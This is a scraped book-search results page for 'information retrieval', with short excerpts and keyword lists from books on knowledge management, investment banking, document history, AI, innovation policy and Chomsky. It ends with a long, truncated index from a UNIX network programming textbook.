The difficulty of this central challenge, however, has been obscured by the redefinition that, as we noted earlier, infoenthusiasts tend to indulge. The definitions of knowledge management that began this chapter perform a familiar two-step. First, they define the core problem in terms of information, so that, second, they can put solutions in the province of information technology.13 Here, retrieval looks as easy as search. Page 125 If information retrieval were all that is required for such things as knowledge management or best practice, HP would have nothing to worry about. It has an abundance of very good information technology. The persistence of HP's problem, then, argues that knowledge management, knowledge, and learning involve more than information. In the rest of this chapter we try to understand what else is involved, looking primarily at knowledge and learning on the assumption that these need to be understood before knowledge management can be considered.


pages: 290 words: 83,248

The Greed Merchants: How the Investment Banks Exploited the System by Philip Augar

Andy Kessler, barriers to entry, Berlin Wall, Big bang: deregulation of the City of London, Bonfire of the Vanities, business cycle, buttonwood tree, buy and hold, capital asset pricing model, commoditize, corporate governance, corporate raider, crony capitalism, cross-subsidies, financial deregulation, financial innovation, fixed income, Gordon Gekko, high net worth, information retrieval, interest rate derivative, invisible hand, John Meriwether, Long Term Capital Management, Martin Wolf, new economy, Nick Leeson, offshore financial centre, pensions crisis, regulatory arbitrage, Sand Hill Road, shareholder value, short selling, Silicon Valley, South Sea Bubble, statistical model, Telecommunications Act of 1996, The Chicago School, The Predators' Ball, The Wealth of Nations by Adam Smith, transaction costs, tulip mania, value at risk, yield curve

These institutions manage the pooled assets of millions of savers, policy holders, pensioners and workers investing for retirement. They range in size from top firms like UBS, Fidelity, State Street, and Barclays Global Investors, which manage over a trillion dollars apiece, to small hedge funds looking after a few million dollars. They rely heavily on brokers whose job is to provide them with advice, information and share dealing: ‘Our best brokers have a great appetite for information retrieval and dissemination. We get our first Bloomberg messages at 5.20 a.m., it’s an information game. We pay brokers $60 million of commission out of a $3 billion fund and most goes to those that phone us most often. They are fast ten-second conversations, often Bloomberg driven. I get a thousand e-mails a day and I read them all.’7 The broking divisions of the top investment banks flood their clients with information: ‘We give them a view on every single price movement; it’s all about short term momentum.


Paper Knowledge: Toward a Media History of Documents by Lisa Gitelman

Andrew Keen, computer age, corporate governance, deskilling, Douglas Engelbart, Douglas Engelbart, East Village, en.wikipedia.org, information retrieval, Internet Archive, invention of movable type, Jaron Lanier, knowledge economy, Marshall McLuhan, Mikhail Gorbachev, national security letter, On the Economy of Machinery and Manufactures, optical character recognition, profit motive, QR code, RAND corporation, RFC: Request For Comment, Shoshana Zuboff, Silicon Valley, Steve Jobs, The Structural Transformation of the Public Sphere, Turing test, WikiLeaks, Works Progress Administration

Even his text was drawn, in the sense that the text display program used to put legends on drawings built characters “by means of special tables which indicate the locations of line and circle segments to make up the letters and numbers”—a process that, in a sense, looked forward to PostScript, TrueType, and pdf. 30 Characters were typed in, but then they were generated graphically by the system for display on screen. Both microform databanks and Sutherland’s Sketchpad gesture selectively toward a prehistory for the pdf page image because both—though differently—mobilized pages and images of pages for a screen-­based interface. The databanks retrieved televisual reproductions of existing source pages, modeling not just information retrieval but also encouraging certain citation norms (since users could indicate that, for example, “the information appears on page 10”). Meanwhile, Sketchpad established a page as a fixed computational field, a visible ground on which further computational objects might be rendered. The portable document format is related more tenuously to mainframes and microform, even though today’s reference databases—the majority of which of course include and serve up pdf —clearly descend in some measure from experiments like Intrex and the Times Information Bank.


pages: 339 words: 94,769

Possible Minds: Twenty-Five Ways of Looking at AI by John Brockman

AI winter, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, artificial general intelligence, Asilomar, autonomous vehicles, basic income, Benoit Mandelbrot, Bill Joy: nanobots, Buckminster Fuller, cellular automata, Claude Shannon: information theory, Daniel Kahneman / Amos Tversky, Danny Hillis, David Graeber, easy for humans, difficult for computers, Elon Musk, Eratosthenes, Ernest Rutherford, finite state, friendly AI, future of work, Geoffrey West, Santa Fe Institute, gig economy, income inequality, industrial robot, information retrieval, invention of writing, James Watt: steam engine, Johannes Kepler, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, Kevin Kelly, Kickstarter, Laplace demon, Loebner Prize, market fundamentalism, Marshall McLuhan, Menlo Park, Norbert Wiener, optical character recognition, pattern recognition, personalized medicine, Picturephone, profit maximization, profit motive, RAND corporation, random walk, Ray Kurzweil, Richard Feynman, Rodney Brooks, self-driving car, sexual politics, Silicon Valley, Skype, social graph, speech recognition, statistical model, Stephen Hawking, Steven Pinker, Stewart Brand, strong AI, superintelligent machines, supervolcano, technological singularity, technoutopianism, telemarketer, telerobotics, the scientific method, theory of mind, Turing machine, Turing test, universal basic income, Upton Sinclair, Von Neumann architecture, Whole Earth Catalog, Y2K, zero-sum game

, used 85,000 watts real time, while the human brains were using 20 watts each. To be fair, the human body needs 100 watts to operate and twenty years to build, hence about 6 trillion joules of energy to “manufacture” a mature human brain. The cost of manufacturing Watson-scale computing is similar. So why aren’t humans displacing computers? For one, the Jeopardy! contestants’ brains were doing far more than information retrieval—much of which would be considered mere distractions by Watson (e.g., cerebellar control of smiling). Other parts allow leaping out of the box with transcendence unfathomable by Watson, such as what we see in Einstein’s five annus mirabilis papers of 1905. Also, humans consume more energy than the minimum (100 watts) required for life and reproduction. People in India use an average of 700 watts per person; it’s 10,000 watts in the U.S.


pages: 382 words: 92,138

The Entrepreneurial State: Debunking Public vs. Private Sector Myths by Mariana Mazzucato

"Robert Solow", Apple II, banking crisis, barriers to entry, Bretton Woods, business cycle, California gold rush, call centre, carbon footprint, Carmen Reinhart, cleantech, computer age, creative destruction, credit crunch, David Ricardo: comparative advantage, demand response, deskilling, endogenous growth, energy security, energy transition, eurozone crisis, everywhere but in the productivity statistics, Financial Instability Hypothesis, full employment, G4S, Growth in a Time of Debt, Hyman Minsky, incomplete markets, information retrieval, intangible asset, invisible hand, Joseph Schumpeter, Kenneth Rogoff, Kickstarter, knowledge economy, knowledge worker, natural language processing, new economy, offshore financial centre, Philip Mirowski, popular electronics, profit maximization, Ralph Nader, renewable energy credits, rent-seeking, ride hailing / ride sharing, risk tolerance, shareholder value, Silicon Valley, Silicon Valley ideology, smart grid, Steve Jobs, Steve Wozniak, The Wealth of Nations by Adam Smith, Tim Cook: Apple, too big to fail, total factor productivity, trickle-down economics, Washington Consensus, William Shockley: the traitorous eight

Available online at http://www.guardian.co.uk/technology/2002/apr/04/internetnews.maths/print (accessed 10 October 2012). DIUS (Department of Innovation, Universities and Skills). 2008. Innovation Nation, March. Cm 7345. London: DIUS. DoD (United States Department of Defense). 2011. Selected Acquisition Report (SAR): RCS: DD-A&T(Q&A)823-166 : NAVSTAR GPS: Defense Acquisition Management Information Retrieval (DAMIR). Los Angeles, 31 December. DoE (United States Department of Energy). 2007. ‘DOE-Supported Researcher Is Co-winner of 2007 Nobel Prize in Physics’. 10 September. Available online at http://science.energy.gov/news/in-the-news/2007/10-09-07/?p=1 (accessed 21 January 2013). _____. 2009. ‘DOE Awards $377 Million in Funding for 46 Energy Frontier Research Centers’. Energy.gov, 6 August.


Noam Chomsky: A Life of Dissent by Robert F. Barsky

Albert Einstein, anti-communist, centre right, feminist movement, Howard Zinn, information retrieval, means of production, Norman Mailer, profit motive, Ralph Nader, Ronald Reagan, strong AI, The Bell Curve by Richard Herrnstein and Charles Murray, theory of mind, Yom Kippur War

Harris 83) Zellig Harris, Chomsky recalls, "had this idea of trying to do something new by looking at the structure of discourse. He tried to use the features of linguistic analysis for discourse analysis" (qtd. in R. A. Harris 83). From this project discourse analysis was born. Chomsky was in search of transformations "to model the linguistic knowledge in a native speaker's head," while Harris was interested in "such practical purposes as machine translation and automated information retrieval" (R. A. Harris 84). Their linguistic interests were irrevocably diverging. Chomsky's last communications with Harris were in the early 1960s, "when [Harris] asked me to [approach] contacts at the [National Science Foundation] for a research contract for him, which I did. We then spent a couple of days together in Israel, in 1964. After that, there was no contact. No falling out, just a mutual understanding, better left unsaid" (23 June 1994).


pages: 344 words: 94,332

The 100-Year Life: Living and Working in an Age of Longevity by Lynda Gratton, Andrew Scott

3D printing, Airbnb, assortative mating, carbon footprint, Clayton Christensen, collapse of Lehman Brothers, creative destruction, crowdsourcing, delayed gratification, disruptive innovation, diversification, Downton Abbey, Erik Brynjolfsson, falling living standards, financial independence, first square of the chessboard, first square of the chessboard / second half of the chessboard, future of work, gender pay gap, gig economy, Google Glasses, indoor plumbing, information retrieval, intangible asset, Isaac Newton, job satisfaction, longitudinal study, low skilled workers, Lyft, Nelson Mandela, Network effects, New Economic Geography, old age dependency ratio, pattern recognition, pension reform, Peter Thiel, Ray Kurzweil, Richard Florida, Richard Thaler, Second Machine Age, sharing economy, side project, Silicon Valley, smart cities, Stanford marshmallow experiment, Stephen Hawking, Steve Jobs, The Future of Employment, uber lyft, women in the workforce, young professional

Indeed this is already happening at the authors’ own institution of London Business School, where there is an ever-increasing emphasis on the part of both students and firms on ideas and innovation, creativity and entrepreneurship. Aligned to this is the growing importance of human skills and judgement. There are those who argue that even these skills can be performed by AI – pointing, for example, to the development of IBM’s supercomputer Watson, which is able to perform detailed oncological diagnosis. This means that with diagnostic augmentation, the skill set for the medical profession will shift from information retrieval to deeper intuitive experience, more person-to- person skills and greater emphasis on team motivation and judgement. The same technological developments will occur in the education sector, where digital teaching will replace textbooks and classroom teaching and the valuable skills will move towards the intricate human skills of empathy, motivation and encouragement. Across a long productive life there will be an increasing focus on general portable skills and capabilities such as mental flexibility and agility.


UNIX® Network Programming, Volume 1: The Sockets Networking API, 3rd Edition by W. Richard Stevens, Bill Fenner, Andrew M. Rudoff

failed state, fudge factor, information retrieval, p-value, RFC: Request For Comment, Richard Stallman, web application

Common alternatives are static host files (normally the file /etc/hosts, as we describe in Figure 11.21), the Network Information System (NIS) or Lightweight Directory Access Protocol (LDAP). Unfortunately, it is implementation-dependent how an administrator configures a host to use the different types of name services. Solaris 2.x, HP-UX 10 and later, and FreeBSD 5.x and later use the file /etc/nsswitch.conf, and AIX uses the file /etc/netsvc.conf. BIND 9.2.2 supplies its own version named the Information Retrieval Service (IRS), which uses the file /etc/irs.conf. If a name server is to be used for hostname lookups, then all these systems use the file /etc/resolv.conf to specify the IP addresses of the name servers. Fortunately, these differences are normally hidden to the application programmer, so we just call the resolver functions such as gethostbyname and gethostbyaddr. Section 11.3 11.3 gethostbyname Function 307 gethostbyname Function Host computers are normally known by human-readable names.

., 304, 889, 950, 954 Hypertext Markup Language, see HTML Hypertext Transfer Protocol, see HTTP I_RECVFD constant, 420 I_SENDFD constant, 420 IANA (Internet Assigned Numbers Authority), 50 – 52, 215, 311, 950, 953 IBM, xxiii ICMP (Internet Control Message Protocol), 33, 62, 200, 249, 256 – 257, 735, 739, 742, 755, 896, 922, UNIX Network Programming 925 address request, 739, 883 code field, 882 destination unreachable, 100 – 101, 144, 200, 249, 762, 764 – 765, 771, 775, 865, 883 – 884 destination unreachable, fragmentation required, 56, 771, 883 echo reply, 735, 741, 883 – 884 echo request, 735, 739, 741, 883 – 884 header, picture of, 882 message daemon, implementation, 769 – 786 packet too big, 56, 771, 884 parameter problem, 720, 883 – 884 port unreachable, 249, 253, 257, 265, 534, 755, 761, 764, 771, 794, 815, 883 – 884, 925 redirect, 485, 497, 883 – 884 router advertisement, 735, 741, 883 – 884 router solicitation, 735, 883 – 884 source quench, 771 – 772, 883 time exceeded, 755, 761, 764, 771, 883 – 884 timestamp request, 739, 883 type field, 882 ICMP6_FILTER socket option, 216, 740 ICMP6_FILTER_SETBLOCK macro, definition of, 740 ICMP6_FILTER_SETBLOCKALL macro, definition of, 740 ICMP6_FILTER_SETPASS macro, definition of, 740 ICMP6_FILTER_SETPASSALL macro, definition of, 740 ICMP6_FILTER_WILLBLOCK macro, definition of, 740 ICMP6_FILTER_WILLPASS macro, definition of, 740 icmp6_filter structure, 193, 216, 740 icmpcode_v4 function, 765 icmpcode_v6 function, 765 icmpd program, 769, 772, 774 – 786, 946 icmpd_dest member, 772 icmpd_err member, 771, 774, 783 – 784 icmpd_errno member, 771 icmpd.h header, 775 ICMPv4 (Internet Control Message Protocol version 4), 33 – 34, 735, 740, 769, 871, 882 – 884 checksum, 737, 753, 806, 882 header, 743, 755 message types, 883 ICMPv6 (Internet Control Message Protocol version 6), 33 – 34, 216, 735, 738, 769, 882 – 884 checksum, 738, 753 – 754, 882 header, 744, 755 message types, 884 multicast listener done, 884 multicast listener query, 884 multicast listener report, 884 Index 965 neighbor advertisement, 884 neighbor advertisement, inverse, 884 neighbor solicitation, 884 neighbor solicitation, inverse, 884 socket option, 216 type filtering, 740 – 741 id program, 431 ident member, 405 identification field, IPv4, 870 IEC (International Electrotechnical Commission), 26, 950 IEEE (Institute of Electrical and Electronics Engineers), 26, 509, 550, 879, 950 IEEE-IX, 26 IETF (Internet Engineering Task Force), 28, 947 if_announcemsghdr structure, 487 definition of, 488 if_freenameindex function, 504 – 508 definition of, 504 source code, 508 if_index member, 504, 903 if_indextoname function, 504 – 508, 566, 568, 593 definition of, 504 source code, 506 if_msghdr structure, 487, 502 definition of, 488 if_name member, 504, 508, 903 if_nameindex function, 486, 504 – 508 definition of, 504 source code, 507 if_nameindex structure, 504, 507 – 508, 903 definition of, 504 if_nametoindex function, 486, 504 – 508, 566 – 567, 569 definition of, 504 source code, 505 ifa_msghdr structure, 487 definition of, 488 ifam_addrs member, 489, 493 ifc_buf member, 469 – 470 ifc_len member, 77, 468, 470 ifc_req member, 469 ifconf structure, 77, 467 – 468, 470 definition of, 469 ifconfig program, 23, 25, 103, 234, 471, 480 IFF_BROADCAST constant, 480 IFF_POINTOPOINT constant, 480 IFF_PROMISC constant, 792 IFF_UP constant, 480 ifi_hlen member, 473, 478, 502 ifi_index member, 502 ifi_info structure, 469, 471, 473, 475, 478, 484, 500, 502, 608 ifi_next member, 471, 478 ifm_addrs member, 489, 493 966 UNIX Network Programming ifm_type member, 502 ifma_msghdr structure, 487 definition of, 488 ifmam_addrs member, 489 IFNAMSIZ constant, 504 ifr_addr member, 469, 480 – 481 ifr_broadaddr member, 469, 481, 484 ifr_data member, 469 ifr_dstaddr member, 469, 481, 484 ifr_flags member, 469, 480 – 481 ifr_metric member, 469, 481 ifr_name member, 470, 480 ifreq structure, 467 – 468, 470, 475, 477, 480, 484, 568 definition of, 469 IFT_NONE constant, 591 IGMP (Internet Group Management Protocol), 33 – 34, 556, 735, 739 – 740, 871 checksum, 753 ILP32, programming model, 28 imperfect multicast filtering, 555 implementation ICMP message daemon, 769 – 786 ping program, 741 – 754 traceroute program, 755 – 768 imr_interface member, 560, 562, 568 imr_multiaddr member, 560, 562 imr_sourceaddr member, 562 IN6_IS_ADDR_LINKLOCAL macro, definition of, 360 IN6_IS_ADDR_LOOPBACK macro, definition of, 360 IN6_IS_ADDR_MC_GLOBAL macro, definition of, 360 IN6_IS_ADDR_MC_LINKLOCAL macro, definition of, 360 IN6_IS_ADDR_MC_NODELOCAL macro, definition of, 360 IN6_IS_ADDR_MC_ORGLOCAL macro, definition of, 360 IN6_IS_ADDR_MC_SITELOCAL macro, definition of, 360 IN6_IS_ADDR_MULTICAST macro, definition of, 360 IN6_IS_ADDR_SITELOCAL macro, definition of, 360 IN6_IS_ADDR_UNSPECIFIED macro, definition of, 360 IN6_IS_ADDR_V4COMPAT macro, definition of, 360 IN6_IS_ADDR_V4MAPPED macro, 355, 360, 362, 745 definition of, 360 in6_addr structure, 193, 561 definition of, 71 in6_pktinfo structure, 588, 615 – 617, 731 Index definition of, 616 IN6ADDR_ANY_INIT constant, 103, 320, 322, 412, 616, 881 IN6ADDR_LOOPBACK_INIT constant, 880 in6addr_any constant, 103, 881 in6addr_loopback constant, 880 in_addr structure, 70, 193, 308, 310, 358, 560, 563 definition of, 68 in_addr_t datatype, 69 – 70 in_cksum function, 753 source code, 753 in_pcbdetach function, 140 in_port_t datatype, 69 INADDR_ANY constant, 13, 53, 102 – 103, 122, 126, 214, 242, 288, 320, 322, 412, 534, 560 – 563, 859, 876, 915 INADDR_LOOPBACK constant, 876 INADDR_MAX_LOCAL_GROUP constant, 915 INADDR_NONE constant, 82, 901, 915 in-addr.arpa domain, 304, 310 in-band data, 645 incarnation, definition of, 44 incomplete connection queue, 104 index, interface, 217, 489, 498, 502, 504 – 508, 560 – 563, 566, 569, 577, 616, 731 INET6_ADDRSTRLEN constant, 83, 86, 901 inet6_opt_append function, 723 – 724 definition of, 723 inet6_opt_find function, 725 definition of, 724 inet6_opt_finish function, 723 – 724 definition of, 723 inet6_opt_get_val function, 725 definition of, 724 inet6_opt_init function, 723 – 724 definition of, 723 inet6_option_alloc function, 732 inet6_option_append function, 732 inet6_option_find function, 732 inet6_option_init function, 732 inet6_option_next function, 732 inet6_option_space function, 732 inet6_opt_next function, 724 – 725 definition of, 724 inet6_opt_set_val function, 723 – 725 definition of, 723 inet6_rth_add function, 727 – 728 definition of, 727 inet6_rthdr_add function, 732 inet6_rthdr_getaddr function, 732 inet6_rthdr_getflags function, 732 inet6_rthdr_init function, 732 inet6_rthdr_lasthop function, 732 inet6_rthdr_reverse function, 732 inet6_rthdr_segments function, 732 inet6_rthdr_space function, 732 UNIX Network Programming inet6_rth_getaddr function, 728, 731 definition of, 728 inet6_rth_init function, 727 – 728 definition of, 727 inet6_rth_reverse function, 728, 730 definition of, 728 inet6_rth_segments function, 728, 731 definition of, 728 inet6_rth_space function, 727 – 728 definition of, 727 inet6_srcrt_print function, 730 – 731 INET_ADDRSTRLEN constant, 83, 86, 901 inet_addr function, 9, 67, 82 – 83, 93 definition of, 82 inet_aton function, 82 – 83, 93, 314 definition of, 82 inet_ntoa function, 67, 82 – 83, 343, 685 definition of, 82 inet_ntop function, 67, 82 – 86, 93, 110, 309, 341, 343, 345, 350, 593, 731 definition of, 83 IPv4-only version, source code, 85 inet_pton function, 8 – 9, 11, 67, 82 – 85, 93, 290, 333, 343, 930 definition of, 83 IPv4-only version, source code, 85 inet_pton_loose function, 93 inet_srcrt_add function, 713, 715 inet_srcrt_init function, 712, 715 inet_srcrt_print function, 714 inetd program, 61, 114, 118 – 119, 154, 363, 371 – 380, 587, 613 – 614, 825, 850, 897, 934, 945 Information Retrieval Service, see IRS INFTIM constant, 184, 902 init program, 132, 145, 938 init_v6 function, 749 initial thread, 676 in.rdisc program, 735 Institute of Electrical and Electronics Engineers, see IEEE int16_t datatype, 69 int32_t datatype, 69 int8_t datatype, 69 interface address, UDP, binding, 608 – 612 configuration, ioctl function, 468 – 469 index, 217, 489, 498, 502, 504 – 508, 560 – 563, 566, 569, 577, 616, 731 index, recvmsg function, receiving, 588 – 593 logical, 877 loopback, 23, 792, 799, 809, 876 – 877 message-based, 858 operations, ioctl function, 480 – 481 UDP determining outgoing, 261 – 262 interface-local multicast scope, 552 – 553 International Electrotechnical Commission, see IEC Index 967 International Organization for Standardization, see ISO Internet, 5, 22 Internet Assigned Numbers Authority, see IANA Internet Control Message Protocol, see ICMP Internet Control Message Protocol version 4, see ICMPv4 Internet Control Message Protocol version 6, see ICMPv6 Internet Draft, 947 Internet Engineering Task Force, see IETF Internet Group Management Protocol, see IGMP Internet Protocol, see IP Internet Protocol next generation, see IPng Internet Protocol version 4, see IPv4 Internet Protocol version 6, see IPv6 Internet service provider, see ISP Internetwork Packet Exchange, see IPX interoperability IPv4 and IPv6, 353 – 362 IPv4 client IPv6 server, 354 – 357 IPv6 client IPv4 server, 357 – 359 source code portability, 361 interprocess communication, see IPC interrupts, software, 129 inverse, ICMPv6 neighbor advertisement, 884 ICMPv6 neighbor solicitation, 884 I/O asynchronous, 160, 468, 663 definition of, Unix, 399 model, asynchronous, 158 – 159 model, blocking, 154 – 155 model, comparison of, 159 – 160 model, I/O, multiplexing, 156 – 157 model, nonblocking, 155 – 156 model, signal-driven, 157 – 158 models, 154 – 160 multiplexing, 153 – 189 multiplexing I/O, model, 156 – 157 nonblocking, 88, 165, 234 – 235, 388, 398, 435 – 464, 468, 665, 669, 671, 919, 945 signal-driven, 200, 234 – 235, 663 – 673 standard, 168, 344, 399 – 402, 409, 437, 935, 952 synchronous, 160 ioctl function, 191, 222, 233 – 234, 399, 403 – 404, 409, 420, 465 – 469, 474 – 475, 477 – 478, 480 – 485, 500, 538, 566, 568, 585, 647, 654, 664, 666, 669, 790, 792, 799, 852, 857, 868 ARP cache operations, 481 – 483 definition of, 466, 857 file operations, 468 interface configuration, 468 – 469 interface operations, 480 – 481 routing table operations, 483 – 484 socket operations, 466 – 467 STREAMS, 857 – 858 968 UNIX Network Programming IOV_MAX constant, 390 iov_base member, 389 iov_len member, 389, 392 iovec structure, 389 – 391, 393, 601 definition of, 389 IP (Internet Protocol), 33 fragmentation and broadcast, 537 – 538 fragmentation and multicast, 571 Multicast Infrastructure, 571, 584 – 585 Multicast Infrastructure session announcements, 571 – 575 routing, 869 spoofing, 108, 948 version number field, 869, 871 ip6_mtuinfo structure, definition of, 619 ip6.arpa domain, 304 ip6m_addr member, 619 ip6m_mtu member, 619 IP_ADD_MEMBERSHIP socket option, 193, 560, 562 IP_ADD_SOURCE_MEMBERSHIP socket option, 193, 560 IP_BLOCK_SOURCE socket option, 193, 560, 562 IP_DROP_MEMBERSHIP socket option, 193, 560 – 561 IP_DROP_SOURCE_MEMBERSHIP socket option, 193, 560 IP_HDRINCL socket option, 193, 214, 710, 736 – 738, 753, 755, 790, 793, 805 – 806 IP_MULTICAST_IF socket option, 193, 559, 563, 945 IP_MULTICAST_LOOP socket option, 193, 559, 563 IP_MULTICAST_TTL socket option, 193, 215, 559, 563, 871, 945 IP_OPTIONS socket option, 193, 214, 709 – 710, 718, 733, 945 IP_RECVDSTADDR socket option, 193, 211, 214, 251, 265, 392 – 396, 587 – 588, 590, 592, 608, 616, 620, 666, 895 ancillary data, picture of, 394 IP_RECVIF socket option, 193, 215, 395, 487, 588, 590, 592, 608, 620, 666 ancillary data, picture of, 591 IP_TOS socket option, 193, 215, 870, 895 IP_TTL socket option, 193, 215, 218, 755, 761, 871, 895 IP_UNBLOCK_SOURCE socket option, 193, 560 ip_id member, 740, 806 ip_len member, 737, 740, 806 ip_mreq structure, 193, 560, 568 definition of, 560 ip_mreq_source structure, 193 definition of, 562 ip_off member, 737, 740 IPC (interprocess communication), 411 – 412, Index 545 – 547, 675 ipi6_addr member, 616 ipi6_ifindex member, 616 ipi_addr member, 588, 901 ipi_ifindex member, 588, 901 IPng (Internet Protocol next generation), 871 ipopt_dst member, 714 ipopt_list member, 714 ipoption structure, definition of, 714 IPPROTO_ICMP constant, 736 IPPROTO_ICMPV6 constant, 193, 216, 738, 740 IPPROTO_IP constant, 214, 394 – 395, 591, 710 IPPROTO_IPV6 constant, 216, 395, 615 – 619, 722, 727 IPPROTO_RAW constant, 737 IPPROTO_SCTP constant, 97, 222, 288 IPPROTO_TCP constant, 97, 219, 288, 519 IPPROTO_UDP constant, 97 IPsec, 951 IPv4 (Internet Protocol version 4), 33, 869 address, 874 – 877 and IPv6 interoperability, 353 – 362 checksum, 214, 737, 753, 871 client IPv6 server, interoperability, 354 – 357 destination address, 871 fragment offset field, 871 header, 743, 755, 869 – 871 header length field, 870 header, picture of, 870 identification field, 870 multicast address, 549 – 551 multicast address, ethernet mapping, picture of, 550 options, 214, 709 – 711, 871 protocol field, 871 receiving packet information, 588 – 593 server, interoperability, IPv6 client, 357 – 359 socket address structure, 68 – 70 socket option, 214 – 215 source address, 871 source routing, 711 – 719 total length field, 870 IPv4-compatible IPv6 address, 880 IPv4/IPv6 host, definition of, 34 IPv4-mapped IPv6 address, 93, 322, 333, 354 – 360, 745, 879 – 880 IPv6 (Internet Protocol version 6), xx, 33, 871 address, 877 – 881 backbone, see 6bone checksum, 216, 738, 873 client IPv4 server, interoperability, 357 – 359 destination address, 873 destination options, 719 – 725 extension headers, 719 flow label field, 871 getaddrinfo function, 322 – 323 UNIX Network Programming header, 744, 755, 871 – 874 header, picture of, 872 historical advanced API, 732 hop-by-hop options, 719 – 725 interoperability, IPv4 and, 353 – 362 multicast address, 551 – 552 multicast address, ethernet mapping, picture of, 550 multicast address, picture of, 551 next header field, 872 options, see IPv6, extension headers path MTU control, 618 – 619 payload length field, 872 receiving packet information, 615 – 618 routing header, 725 – 731 server, interoperability, IPv4 client, 354 – 357 socket address structure, 71 – 72 socket option, 216 – 218 source address, 873 source routing, 725 – 731 source routing segments left, 725 source routing type, 725 sticky options, 731 – 732 IPV6_ADD_MEMBERSHIP socket option, 560 – 561 IPV6_ADDRFORM socket option, 361 IPV6_CHECKSUM socket option, 193, 216, 738 IPV6_DONTFRAG socket option, 216, 619 IPV6_DROP_MEMBERSHIP socket option, 560 – 561 IPV6_DSTOPTS socket option, 193, 395, 732 ancillary data, picture of, 722 IPV6_HOPLIMIT socket option, 193, 395, 617, 732, 749 – 750, 873 ancillary data, picture of, 615 IPV6_HOPOPTS socket option, 193, 395, 732 ancillary data, picture of, 722 IPV6_JOIN_GROUP socket option, 193, 560, 562 IPV6_LEAVE_GROUP socket option, 193, 561 IPV6_MULTICAST_HOPS socket option, 193, 559, 563, 617, 873 IPV6_MULTICAST_IF socket option, 193, 559, 563, 616 IPV6_MULTICAST_LOOP socket option, 193, 559, 563 IPV6_NEXTHOP socket option, 193, 217, 395, 617, 732 ancillary data, picture of, 615 IPV6_PATHMTU socket option, 217, 619 IPV6_PKTINFO socket option, 193, 251, 395, 561, 608, 616, 620, 666, 732 ancillary data, picture of, 615 IPV6_PKTOPTIONS socket option, 732 IPV6_RECVDSTOPTS socket option, 217, 722 IPV6_RECVHOPLIMIT socket option, 217 – 218, 617, 749, 873 IPV6_RECVHOPOPTS socket option, 217, 722 Index 969 IPV6_RECVPATHMTU socket option, 216 – 217, 619 IPV6_RECVPKTINFO socket option, 217, 616 – 617, 620 IPV6_RECVRTHDR socket option, 218, 727, 729 IPV6_RECVTCLASS socket option, 218, 618 IPV6_RTHDR socket option, 193, 395, 732 ancillary data, picture of, 727 IPV6_RTHDR_TYPE_0 constant, 727 IPV6_TCLASS socket option, 395, 618, 732, 871 ancillary data, picture of, 615 IPV6_UNICAST_HOPS socket option, 193, 218, 617, 755, 761, 873 IPV6_USE_MIN_MTU socket option, 218, 618 – 619 IPV6_V6ONLY socket option, 218, 357 IPV6_XXX socket options, 218 ipv6_mreq structure, 193, 560, 569 definition of, 560 ipv6mr_interface member, 560, 569 ipv6mr_multiaddr member, 560 IPX (Internetwork Packet Exchange), 952 IRS (Information Retrieval Service), 306 ISO (International Organization for Standardization), 18, 26, 950 ISO 8859, 573 ISP (Internet service provider), 875 iterative server, 15, 114, 243, 821 – 822 Jackson, A., 721, 952 Jacobson, V., 35, 38 – 39, 44, 571, 596, 598 – 599, 737, 788, 790, 896, 949 – 951 Jim, J., 285, 953 Jinmei, T., 28, 216, 397, 719, 738, 744, 953 joinable thread, 678 Jones, R.

., 304, 889, 950, 954 Hypertext Markup Language, see HTML Hypertext Transfer Protocol, see HTTP I_RECVFD constant, 420 I_SENDFD constant, 420 IANA (Internet Assigned Numbers Authority), 50 – 52, 215, 311, 950, 953 IBM, xxiii ICMP (Internet Control Message Protocol), 33, 62, 200, 249, 256 – 257, 735, 739, 742, 755, 896, 922, UNIX Network Programming 925 address request, 739, 883 code field, 882 destination unreachable, 100 – 101, 144, 200, 249, 762, 764 – 765, 771, 775, 865, 883 – 884 destination unreachable, fragmentation required, 56, 771, 883 echo reply, 735, 741, 883 – 884 echo request, 735, 739, 741, 883 – 884 header, picture of, 882 message daemon, implementation, 769 – 786 packet too big, 56, 771, 884 parameter problem, 720, 883 – 884 port unreachable, 249, 253, 257, 265, 534, 755, 761, 764, 771, 794, 815, 883 – 884, 925 redirect, 485, 497, 883 – 884 router advertisement, 735, 741, 883 – 884 router solicitation, 735, 883 – 884 source quench, 771 – 772, 883 time exceeded, 755, 761, 764, 771, 883 – 884 timestamp request, 739, 883 type field, 882 ICMP6_FILTER socket option, 216, 740 ICMP6_FILTER_SETBLOCK macro, definition of, 740 ICMP6_FILTER_SETBLOCKALL macro, definition of, 740 ICMP6_FILTER_SETPASS macro, definition of, 740 ICMP6_FILTER_SETPASSALL macro, definition of, 740 ICMP6_FILTER_WILLBLOCK macro, definition of, 740 ICMP6_FILTER_WILLPASS macro, definition of, 740 icmp6_filter structure, 193, 216, 740 icmpcode_v4 function, 765 icmpcode_v6 function, 765 icmpd program, 769, 772, 774 – 786, 946 icmpd_dest member, 772 icmpd_err member, 771, 774, 783 – 784 icmpd_errno member, 771 icmpd.h header, 775 ICMPv4 (Internet Control Message Protocol version 4), 33 – 34, 735, 740, 769, 871, 882 – 884 checksum, 737, 753, 806, 882 header, 743, 755 message types, 883 ICMPv6 (Internet Control Message Protocol version 6), 33 – 34, 216, 735, 738, 769, 882 – 884 checksum, 738, 753 – 754, 882 header, 744, 755 message types, 884 multicast listener done, 884 multicast listener query, 884 multicast listener report, 884 Index 965 neighbor advertisement, 884 neighbor advertisement, inverse, 884 neighbor solicitation, 884 neighbor solicitation, inverse, 884 socket option, 216 type filtering, 740 – 741 id program, 431 ident member, 405 identification field, IPv4, 870 IEC (International Electrotechnical Commission), 26, 950 IEEE (Institute of Electrical and Electronics Engineers), 26, 509, 550, 879, 950 IEEE-IX, 26 IETF (Internet Engineering Task Force), 28, 947 if_announcemsghdr structure, 487 definition of, 488 if_freenameindex function, 504 – 508 definition of, 504 source code, 508 if_index member, 504, 903 if_indextoname function, 504 – 508, 566, 568, 593 definition of, 504 source code, 506 if_msghdr structure, 487, 502 definition of, 488 if_name member, 504, 508, 903 if_nameindex function, 486, 504 – 508 definition of, 504 source code, 507 if_nameindex structure, 504, 507 – 508, 903 definition of, 504 if_nametoindex function, 486, 504 – 508, 566 – 567, 569 definition of, 504 source code, 505 ifa_msghdr structure, 487 definition of, 488 ifam_addrs member, 489, 493 ifc_buf member, 469 – 470 ifc_len member, 77, 468, 470 ifc_req member, 469 ifconf structure, 77, 467 – 468, 470 definition of, 469 ifconfig program, 23, 